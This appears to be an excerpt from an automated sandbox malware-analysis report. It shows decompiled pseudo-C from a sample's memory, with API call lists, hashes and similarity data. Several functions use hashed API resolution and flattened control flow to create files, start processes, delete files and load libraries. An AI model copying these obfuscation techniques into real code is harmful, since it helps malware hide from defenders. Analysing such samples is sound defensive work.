                                                      				signed int _t41;
                                                      				void* _t43;
                                                      
                                                      				_t26 = _v572;
                                                      				_t41 = 0x17978d81;
                                                      				_t39 = 0;
                                                      				do {
                                                      					while(_t41 != 0xaceab63) {
                                                      						if(_t41 == 0xba3fea7) {
                                                      							_push(_t39);
                                                      							_push(_t39);
                                                      							_push(3);
                                                      							_push(_t39);
                                                      							_push(1);
                                                      							_push(0x80);
                                                      							_t37 = 0xb82a8ec3;
                                                      							_push( &_v524);
                                                      							E02252F84(0xf568ce83, 0xb82a8ec3, 0x1a);
                                                      							_pop(_t30); // executed
                                                      							_t14 = CreateFileW(??, ??, ??, ??, ??, ??, ??); // executed
                                                      							_t26 = _t14;
                                                      							__eflags = _t26 - 0xffffffff;
                                                      							if(_t26 == 0xffffffff) {
                                                      								L19:
                                                      								return _t39;
                                                      							}
                                                      							_t41 = 0x308611ab;
                                                      							continue;
                                                      						}
                                                      						if(_t41 == 0x17978d81) {
                                                      							_t41 = 0x1f766521;
                                                      							continue;
                                                      						}
                                                      						if(_t41 == 0x1f766521) {
                                                      							_t37 = 0x738e43f2;
                                                      							_t17 = E02252F84(0xf568ce83, 0x738e43f2, 0x169);
                                                      							_t30 = _t39;
                                                      							 *_t17( &_v524, 0x104);
                                                      							_t41 = 0xba3fea7;
                                                      							continue;
                                                      						}
                                                      						if(_t41 == 0x269b685a) {
                                                      							_t19 = E0225438D(_t30, _t37);
                                                      							_t43 = _v572 - _v548;
                                                      							asm("sbb ecx, [esp+0x2c]");
                                                      							__eflags = _v568 - _t37;
                                                      							if(__eflags < 0) {
                                                      								goto L19;
                                                      							}
                                                      							if(__eflags > 0) {
                                                      								L18:
                                                      								_t39 = 1;
                                                      								__eflags = 1;
                                                      								goto L19;
                                                      							}
                                                      							__eflags = _t43 - _t19;
                                                      							if(_t43 < _t19) {
                                                      								goto L19;
                                                      							}
                                                      							goto L18;
                                                      						}
                                                      						if(_t41 == 0x308611ab) {
                                                      							 *((intOrPtr*)(E02252F84(0xf568ce83, 0x854b8830, 0x4c)))();
                                                      							_t37 = 0x2e998fdc;
                                                      							asm("sbb esi, esi");
                                                      							_t41 = (_t41 & 0xe8cf945b) + 0x21ff1708;
                                                      							_t24 = E02252F84(0xf568ce83, 0x2e998fdc, 0x167);
                                                      							_t30 = _t26;
                                                      							 *_t24(_t26, _t39,  &_v564, 0x28);
                                                      						}
                                                      						goto L13;
                                                      					}
                                                      					_push( &_v572);
                                                      					 *((intOrPtr*)(E02252F84(0xf568ce83, 0xac6e2571, 0x1fb)))();
                                                      					_t41 = 0x269b685a;
                                                      					L13:
                                                      				} while (_t41 != 0x21ff1708);
                                                      				goto L19;
                                                      			}



















                                                      APIs
                                                      • CreateFileW.KERNELBASE(?,00000080,00000001,00000000,00000003,00000000,00000000,?,2895FB0B,?,?), ref: 02255B96
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true
                                                      • Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp
                                                      • Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 727a16866b20b17e7bd20a99c9fb0f2b9f5606ecfee9563051ca270abacf030b
                                                      • Instruction ID: 658cde1188410357af69adfb402181e1022538cb56737ff4a6b2cacdc9ebb420
                                                      • Opcode Fuzzy Hash: 727a16866b20b17e7bd20a99c9fb0f2b9f5606ecfee9563051ca270abacf030b
                                                      • Instruction Fuzzy Hash: C231B072A6433557D924A8DC4CC8E7FE29A8BC0320F94C11AFD55A72CCCE718D488792
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E022535F0(WCHAR* __ecx, WCHAR* __edx, int _a4, intOrPtr _a12) {
                                                      				struct _PROCESS_INFORMATION _v20;
                                                      				struct _STARTUPINFOW _v88;
                                                      				int _t15;
                                                      				long _t23;
                                                      				WCHAR* _t41;
                                                      
                                                      				_t41 = __edx;
                                                      				_t23 = 0x44;
                                                      				E02252FB5(_t23);
                                                      				_v88.cb = _t23;
                                                      				E02252F84(0xf568ce83, 0xb32b3238, 0x173);
                                                      				_t15 = CreateProcessW(__ecx, _t41, 0, 0, _a4, 0, 0, 0,  &_v88,  &_v20); // executed
                                                      				if(_t15 == 0) {
                                                      					return 0;
                                                      				}
                                                      				if(_a12 == 0) {
                                                      					_push(_v20.hProcess);
                                                      					 *((intOrPtr*)(E02252F84(0xf568ce83, 0x2e998fdc, 0x167)))();
                                                      					_push(_v20.hThread);
                                                      					 *((intOrPtr*)(E02252F84(0xf568ce83, 0x2e998fdc, 0x167)))();
                                                      				} else {
                                                      					asm("movsd");
                                                      					asm("movsd");
                                                      					asm("movsd");
                                                      					asm("movsd");
                                                      				}
                                                      				return 1;
                                                      			}









                                                      APIs
                                                      • CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,00000000,2895FB0B,166BA503), ref: 02253638
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true
                                                      • Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp
                                                      • Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CreateProcess
                                                      • String ID:
                                                      • API String ID: 963392458-0
                                                      • Opcode ID: 2fd5766700db880170263c1083bdc509e4c9d4412641a4817670c8aa5dfc0925
                                                      • Instruction ID: e5ba099c61546162bfeb8dfae7a8d85de8ce14edf0f39f43e18c16eebc362928
                                                      • Opcode Fuzzy Hash: 2fd5766700db880170263c1083bdc509e4c9d4412641a4817670c8aa5dfc0925
                                                      • Instruction Fuzzy Hash: C111E572A14229BFAB14DEE45C40CBFB7AEDB847A4B20852ABD15DB388DE71CD058560
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 54%
                                                      			E022527D0(void* __ecx, void* __eflags) {
                                                      				short _v524;
                                                      				void* _t3;
                                                      				int _t10;
                                                      
                                                      				_t3 = E02252674(0x2259160);
                                                      				_push(__ecx);
                                                      				_t21 = _t3;
                                                      				_push(_t3);
                                                      				_push(0x104);
                                                      				_push( &_v524);
                                                      				 *((intOrPtr*)(E02252F84(0xa83808e5, 0xb436274a, 0x156)))();
                                                      				E02252FDF(_t21);
                                                      				E02252F84(0xf568ce83, 0x70fee5ac, 0xcb);
                                                      				_t10 = DeleteFileW( &_v524); // executed
                                                      				return _t10;
                                                      			}







                                                      APIs
                                                      • DeleteFileW.KERNELBASE(?), ref: 02252834
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true
                                                      • Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp
                                                      • Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: 1e570a35696aa29edbe450e440426ad68a9a1241a644a03fa55000e9d390346d
                                                      • Instruction ID: ecb1c3088fbfc3163c936ec63c1655d3e8b3ef96f6c02fcae092b6884a613854
                                                      • Opcode Fuzzy Hash: 1e570a35696aa29edbe450e440426ad68a9a1241a644a03fa55000e9d390346d
                                                      • Instruction Fuzzy Hash: E3F02720750324A7E21471B46C45EBB329ECBC4321F14435AAD54D72C59E748D8185E2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040A3D5(void* __ebx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				void* _t10;
                                                      				long _t11;
                                                      				void* _t15;
                                                      				void* _t16;
                                                      				struct HWND__* _t18;
                                                      
                                                      				if(_a8 != 0x360) {
                                                      					_t18 = _a4;
                                                      					_t10 = E00409CBE(_t15, _t16, _t18, __eflags, _t18);
                                                      					__eflags = _t10;
                                                      					if(_t10 == 0) {
                                                      						L5:
                                                      						_t11 = DefWindowProcA(_t18, _a8, _a12, _a16);
                                                      						L6:
                                                      						return _t11;
                                                      					}
                                                      					__eflags =  *((intOrPtr*)(_t10 + 0x20)) - _t18;
                                                      					if(__eflags != 0) {
                                                      						goto L5;
                                                      					}
                                                      					_t11 = E0040A2E8(__ebx, _t16, _t18, __eflags, _t10, _t18, _a8, _a12, _a16); // executed
                                                      					goto L6;
                                                      				}
                                                      				return 1;
                                                      			}











                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a17bd75e753565c8c32fb72635d9df3520f5a8b73c1fc148d280dd7364c2ad56
                                                      • Instruction ID: 3517ec6858cdfff4f58573c3d98e2797eedff766390b39a1751ee799ad3f77ef
                                                      • Opcode Fuzzy Hash: a17bd75e753565c8c32fb72635d9df3520f5a8b73c1fc148d280dd7364c2ad56
                                                      • Instruction Fuzzy Hash: 57F01236404219BBCF129F919C08CDB3B69FF19350F00C436F91561192C379C931ABAB
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b936a4012c24706efac4ff068db0b712045a314d1aab1eb0685984eebb805aa3
                                                      • Instruction ID: c99c244189d94d7dca9a997e17c70eaa2b4c72b9032cbafb8dd16296e0632aa4
                                                      • Opcode Fuzzy Hash: b936a4012c24706efac4ff068db0b712045a314d1aab1eb0685984eebb805aa3
                                                      • Instruction Fuzzy Hash: AFE080F51242119BCB204E24D4417AB7FD85B51736F205B3FD0B1E32D0D27689C3AB1A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                        • Part of subcall function 022414A0: SetLastError.KERNEL32(0000007F), ref: 022414DB
                                                      • ExitProcess.KERNEL32 ref: 02242620
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.347463465.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2241000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: ErrorExitLastProcess
                                                      • String ID:
                                                      • API String ID: 1697593849-0
                                                      • Opcode ID: 07604f6fba4cbb8b038043fd0e55161919fe005ddee500a1829a46dc0fba511e
                                                      • Instruction ID: 329514e8e0ec79831a4a75fb02ef9c1a90581f3d935469546d1c120cee2942de
                                                      • Opcode Fuzzy Hash: 07604f6fba4cbb8b038043fd0e55161919fe005ddee500a1829a46dc0fba511e
                                                      • Instruction Fuzzy Hash: E6E092B8D10308BBEB04EFE0E809B9DBBB4EB00301F408154E80467244EB706A108FA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 64%
                                                      			E02254F76(signed int __edx) {
                                                      				struct HINSTANCE__* _t6;
                                                      				void* _t8;
                                                      				void* _t11;
                                                      				intOrPtr _t14;
                                                      				WCHAR* _t15;
                                                      				void* _t24;
                                                      				signed int _t25;
                                                      				WCHAR* _t27;
                                                      				void* _t28;
                                                      
                                                      				_t25 = __edx;
                                                      				_t27 = E02252674(_t11);
                                                      				E02252F84(0xf568ce83, 0xeaf577de, 0x134);
                                                      				_t6 = LoadLibraryW(_t27);
                                                      				_t14 =  *0x225a4c0; // 0x6031f0
                                                      				 *(_t14 + 4 + _t25 * 4) = _t6;
                                                      				_t15 = _t27;
                                                      				_t28 = _t24;
                                                      				_push(_t28);
                                                      				_t8 =  *((intOrPtr*)(E02252F84(0xf568ce83, 0x71eb2479, 0x14d)))();
                                                      				_push(_t15);
                                                      				_push(0);
                                                      				_push(_t8);
                                                      				return  *((intOrPtr*)(E02252F84(0xf568ce83, 0x5e575f04, 0x1e3)))();
                                                      			}













                                                      APIs
                                                      • LoadLibraryW.KERNELBASE(00000000,33CEB415,1925BE3B,02255091,?,2895FB0B,?,?,02254CDA), ref: 02254F97
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.347505404.0000000002251000.00000020.00000001.sdmp, Offset: 02250000, based on PE: true
                                                      • Associated: 00000001.00000002.347493243.0000000002250000.00000004.00000001.sdmp
                                                      • Associated: 00000001.00000002.347513236.0000000002259000.00000004.00000001.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2250000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 6e07970dde88a6d1209a13ae00c41007285756b310ceaf53c7f8f35357918dea
                                                      • Instruction ID: 94ce1a58db0ecbdd5407fff5c23f3293d07e5fa08a696fa4c851a858f7f4075b
                                                      • Opcode Fuzzy Hash: 6e07970dde88a6d1209a13ae00c41007285756b310ceaf53c7f8f35357918dea
                                                      • Instruction Fuzzy Hash: 35D05E257553309B8618AAF9781896A66A6DFC92A5724C7299D1DCB2C4CE708C02CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • VirtualFree.KERNELBASE(?,?,?), ref: 0224182F
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.347463465.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2241000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: FreeVirtual
                                                      • String ID:
                                                      • API String ID: 1263568516-0
                                                      • Opcode ID: 38dc218105373fd44773c0c130e0d4746c7c4daf83264b01d4a4c4a7fa72be85
                                                      • Instruction ID: 64282340d9f3295d39147d2fd07414a40987247c4e94170d017205eebe5a0f09
                                                      • Opcode Fuzzy Hash: 38dc218105373fd44773c0c130e0d4746c7c4daf83264b01d4a4c4a7fa72be85
                                                      • Instruction Fuzzy Hash: A0C04C7A55420CAB8B04DFD8F884DAB37FDBB8C714B148548BA1D87200C630F9108BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      C-Code - Quality: 88%
                                                      			E00410555(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* __ebp;
                                                      				signed int _t38;
                                                      				long _t49;
                                                      				CHAR* _t50;
                                                      				CHAR* _t56;
                                                      				CHAR* _t59;
                                                      				void* _t61;
                                                      				int _t65;
                                                      				CHAR* _t74;
                                                      				void* _t75;
                                                      				void* _t76;
                                                      				void* _t89;
                                                      				void* _t90;
                                                      				CHAR* _t92;
                                                      				void* _t93;
                                                      				void* _t96;
                                                      				struct _WIN32_FIND_DATAA* _t98;
                                                      				void* _t100;
                                                      				CHAR* _t106;
                                                      
                                                      				_t94 = __esi;
                                                      				_t90 = __edx;
                                                      				_t76 = __ecx;
                                                      				_t98 = _t100 - 0x13c;
                                                      				_t38 =  *0x443590; // 0xa920217c
                                                      				 *(_t98 + 0x140) = _t38 ^ _t98;
                                                      				_push(0x14);
                                                      				E0041F6EA(E0043298A, __ebx, __edi, __esi);
                                                      				_t92 =  *(_t98 + 0x14c);
                                                      				_t74 =  *(_t98 + 0x150);
                                                      				 *((intOrPtr*)(_t98 - 0x18)) =  *((intOrPtr*)(_t98 + 0x154));
                                                      				_t106 = _t92;
                                                      				_t107 = _t106 == 0;
                                                      				if(_t106 == 0) {
                                                      					L1:
                                                      					E004037E3(_t74, _t76, _t92, _t94, _t107);
                                                      				}
                                                      				if((0 | _t74 != 0x00000000) == 0) {
                                                      					goto L1;
                                                      				}
                                                      				_t49 = GetFullPathNameA(_t74, 0x104, _t92, _t98 - 0x14);
                                                      				if(_t49 != 0) {
                                                      					__eflags = _t49 - 0x104;
                                                      					if(_t49 >= 0x104) {
                                                      						goto L5;
                                                      					} else {
                                                      						E0040320E(_t98 - 0x10, E0040EA5E());
                                                      						 *(_t98 - 4) =  *(_t98 - 4) & 0x00000000;
                                                      						E0041038B(_t74, _t98, __eflags, _t92, _t98 - 0x10);
                                                      						_t56 = PathIsUNCA( *(_t98 - 0x10));
                                                      						__eflags = _t56;
                                                      						if(_t56 != 0) {
                                                      							L19:
                                                      							E00403036( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
                                                      							_t50 = 1;
                                                      							__eflags = 1;
                                                      						} else {
                                                      							_t59 = GetVolumeInformationA( *(_t98 - 0x10), _t56, _t56, _t56, _t98 - 0x20, _t98 - 0x1c, _t56, _t56);
                                                      							__eflags = _t59;
                                                      							if(_t59 != 0) {
                                                      								__eflags =  *(_t98 - 0x1c) & 0x00000002;
                                                      								if(( *(_t98 - 0x1c) & 0x00000002) == 0) {
                                                      									CharUpperA(_t92);
                                                      								}
                                                      								__eflags =  *(_t98 - 0x1c) & 0x00000004;
                                                      								if(( *(_t98 - 0x1c) & 0x00000004) != 0) {
                                                      									goto L19;
                                                      								} else {
                                                      									_t61 = FindFirstFileA(_t74, _t98);
                                                      									__eflags = _t61 - 0xffffffff;
                                                      									if(_t61 == 0xffffffff) {
                                                      										goto L19;
                                                      									} else {
                                                      										FindClose(_t61);
                                                      										__eflags =  *(_t98 - 0x14);
                                                      										if( *(_t98 - 0x14) == 0) {
                                                      											goto L10;
                                                      										} else {
                                                      											__eflags =  *(_t98 - 0x14) - _t92;
                                                      											if( *(_t98 - 0x14) <= _t92) {
                                                      												goto L10;
                                                      											} else {
                                                      												_t65 = lstrlenA( &(_t98->cFileName));
                                                      												_t89 =  *(_t98 - 0x14) - _t92;
                                                      												__eflags = _t65 + _t89 - 0x104;
                                                      												if(_t65 + _t89 >= 0x104) {
                                                      													goto L10;
                                                      												} else {
                                                      													_t97 = 0x104 - _t89;
                                                      													__eflags = 0x104 - _t89;
                                                      													E00403EBB(_t74, _t90, _t92, 0x104 - _t89, _t98,  *(_t98 - 0x14), _t97,  &(_t98->cFileName));
                                                      													goto L19;
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							} else {
                                                      								_push(_t74);
                                                      								E0041052A( *((intOrPtr*)(_t98 - 0x18)));
                                                      								L10:
                                                      								E00403036( &(( *(_t98 - 0x10))[0xfffffffffffffff0]), _t90);
                                                      								goto L5;
                                                      							}
                                                      						}
                                                      					}
                                                      				} else {
                                                      					E00402FE8(_t74, _t76, _t92, 0x104, _t98, _t92, 0x104, _t74, 0xffffffff);
                                                      					_push(_t74);
                                                      					E0041052A( *((intOrPtr*)(_t98 - 0x18)));
                                                      					L5:
                                                      					_t50 = 0;
                                                      				}
                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t98 - 0xc));
                                                      				_pop(_t93);
                                                      				_pop(_t96);
                                                      				_pop(_t75);
                                                      				return E0041E5DF(_t50, _t75,  *(_t98 + 0x140) ^ _t98, _t90, _t93, _t96);
                                                      			}























                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00410574
                                                      • GetFullPathNameA.KERNEL32(?,00000104,?,?,00000014), ref: 004105B5
                                                        • Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
                                                        • Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804
                                                      • PathIsUNCA.SHLWAPI(?,00000000), ref: 004105FF
                                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0041061D
                                                      • CharUpperA.USER32(?), ref: 00410644
                                                      • FindFirstFileA.KERNEL32(?,00000000), ref: 00410655
                                                      • FindClose.KERNEL32(00000000), ref: 00410661
                                                      • lstrlenA.KERNEL32(?), ref: 00410676
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: FindH_prolog3Path$CharCloseException@8FileFirstFullInformationNameThrowUpperVolumelstrlen
                                                      • String ID:
                                                      • API String ID: 4099955704-0
                                                      • Opcode ID: 8d423071c246daf2073a97ce94b957f1acc84d53f3ea7e5e8a4362d51d6eacf4
                                                      • Instruction ID: c95776d52dd1443ee05a1ca64a85c65a6502b148270e7fb7a51c131ffc65af19
                                                      • Opcode Fuzzy Hash: 8d423071c246daf2073a97ce94b957f1acc84d53f3ea7e5e8a4362d51d6eacf4
                                                      • Instruction Fuzzy Hash: EE41A17190010AABDB21EFA5CC45BFF777DEF54318F00052AF815E2291EB789995CA68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 85%
                                                      			E0041E5DF(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                      				intOrPtr _v0;
                                                      				void* _v804;
                                                      				intOrPtr _v808;
                                                      				intOrPtr _v812;
                                                      				intOrPtr _t6;
                                                      				intOrPtr _t11;
                                                      				intOrPtr _t12;
                                                      				intOrPtr _t13;
                                                      				long _t17;
                                                      				intOrPtr _t21;
                                                      				intOrPtr _t22;
                                                      				intOrPtr _t25;
                                                      				intOrPtr _t26;
                                                      				intOrPtr _t27;
                                                      				intOrPtr* _t31;
                                                      				void* _t34;
                                                      
                                                      				_t27 = __esi;
                                                      				_t26 = __edi;
                                                      				_t25 = __edx;
                                                      				_t22 = __ecx;
                                                      				_t21 = __ebx;
                                                      				_t6 = __eax;
                                                      				_t34 = _t22 -  *0x443590; // 0xa920217c
                                                      				if(_t34 == 0) {
                                                      					asm("repe ret");
                                                      				}
                                                      				 *0x446b48 = _t6;
                                                      				 *0x446b44 = _t22;
                                                      				 *0x446b40 = _t25;
                                                      				 *0x446b3c = _t21;
                                                      				 *0x446b38 = _t27;
                                                      				 *0x446b34 = _t26;
                                                      				 *0x446b60 = ss;
                                                      				 *0x446b54 = cs;
                                                      				 *0x446b30 = ds;
                                                      				 *0x446b2c = es;
                                                      				 *0x446b28 = fs;
                                                      				 *0x446b24 = gs;
                                                      				asm("pushfd");
                                                      				_pop( *0x446b58);
                                                      				 *0x446b4c =  *_t31;
                                                      				 *0x446b50 = _v0;
                                                      				 *0x446b5c =  &_a4;
                                                      				 *0x446a98 = 0x10001;
                                                      				_t11 =  *0x446b50; // 0x0
                                                      				 *0x446a4c = _t11;
                                                      				 *0x446a40 = 0xc0000409;
                                                      				 *0x446a44 = 1;
                                                      				_t12 =  *0x443590; // 0xa920217c
                                                      				_v812 = _t12;
                                                      				_t13 =  *0x443594; // 0x56dfde83
                                                      				_v808 = _t13;
                                                      				 *0x446a90 = IsDebuggerPresent();
                                                      				_push(1);
                                                      				E0042BADB(_t14);
                                                      				SetUnhandledExceptionFilter(0);
                                                      				_t17 = UnhandledExceptionFilter("@jD");
                                                      				if( *0x446a90 == 0) {
                                                      					_push(1);
                                                      					E0042BADB(_t17);
                                                      				}
                                                      				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                      			}

                                                      APIs
                                                      • IsDebuggerPresent.KERNEL32 ref: 00424CB5
                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00424CCA
                                                      • UnhandledExceptionFilter.KERNEL32(@jD), ref: 00424CD5
                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00424CF1
                                                      • TerminateProcess.KERNEL32(00000000), ref: 00424CF8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                      • String ID: @jD
                                                      • API String ID: 2579439406-1635275382
                                                      • Opcode ID: c447d9a5082a45e17c64b574762009e2935f38cb7a259609e812312e6fb4b33c
                                                      • Instruction ID: 353eb8598e0df34b4eb95eb5e3ae3fd6c07366769aae313645bd4fdf51cf0d1b
                                                      • Opcode Fuzzy Hash: c447d9a5082a45e17c64b574762009e2935f38cb7a259609e812312e6fb4b33c
                                                      • Instruction Fuzzy Hash: 6D21F2BC5007A09FC711DF59FC496847BA0FB1B308F52543AE908D3661E7B465848F0E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E00402130(intOrPtr __ecx) {
                                                      				int _v8;
                                                      				int _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				char _v28;
                                                      				signed int _v32;
                                                      				struct HDC__* _v120;
                                                      				char _v124;
                                                      				int _v128;
                                                      				int _v132;
                                                      				int _v136;
                                                      				struct HICON__* _v140;
                                                      				intOrPtr _v144;
                                                      				void* __ebp;
                                                      				signed int _t37;
                                                      				int _t40;
                                                      				intOrPtr _t41;
                                                      				intOrPtr _t66;
                                                      				struct tagRECT* _t82;
                                                      				intOrPtr _t84;
                                                      				intOrPtr _t85;
                                                      				signed int _t86;
                                                      
                                                      				_t37 =  *0x443590; // 0xa920217c
                                                      				_v32 = _t37 ^ _t86;
                                                      				_v144 = __ecx;
                                                      				_t40 = IsIconic( *(_v144 + 0x20));
                                                      				_t87 = _t40;
                                                      				if(_t40 == 0) {
                                                      					_t41 = E00405C6C(_t66, _v144, _t84, _t85, __eflags);
                                                      				} else {
                                                      					_push(_v144);
                                                      					E0040E7ED(_t66,  &_v124, _t84, _t85, _t87);
                                                      					_t88 =  &_v124;
                                                      					if( &_v124 != 0) {
                                                      						_v136 = _v120;
                                                      					} else {
                                                      						_v136 = 0;
                                                      					}
                                                      					SendMessageA( *(_v144 + 0x20), 0x27, _v136, 0);
                                                      					_v128 = GetSystemMetrics(0xb);
                                                      					_v132 = GetSystemMetrics(0xc);
                                                      					_t82 =  &_v28;
                                                      					GetClientRect( *(_v144 + 0x20), _t82);
                                                      					asm("cdq");
                                                      					_v12 = _v20 - _v28 - _v128 + 1 - _t82 >> 1;
                                                      					asm("cdq");
                                                      					_v8 = _v16 - _v24 - _v132 + 1 - _t82 >> 1;
                                                      					_v140 =  *((intOrPtr*)(_v144 + 0x74));
                                                      					_t79 = _v8;
                                                      					DrawIcon(_v120, _v12, _v8, _v140);
                                                      					_t41 = E0040E841(_t66,  &_v124, _t84, _t85, _t88);
                                                      				}
                                                      				return E0041E5DF(_t41, _t66, _v32 ^ _t86, _t79, _t84, _t85);
                                                      			}

                                                      APIs
                                                      • IsIconic.USER32(?), ref: 00402153
                                                        • Part of subcall function 0040E7ED: __EH_prolog3.LIBCMT ref: 0040E7F4
                                                        • Part of subcall function 0040E7ED: BeginPaint.USER32(?,?,00000004,00405C83,?,00000058,00402236), ref: 0040E820
                                                      • SendMessageA.USER32(?,00000027,?,00000000), ref: 004021A1
                                                      • GetSystemMetrics.USER32 ref: 004021A9
                                                      • GetSystemMetrics.USER32 ref: 004021B4
                                                      • GetClientRect.USER32 ref: 004021CB
                                                      • DrawIcon.USER32 ref: 0040221B
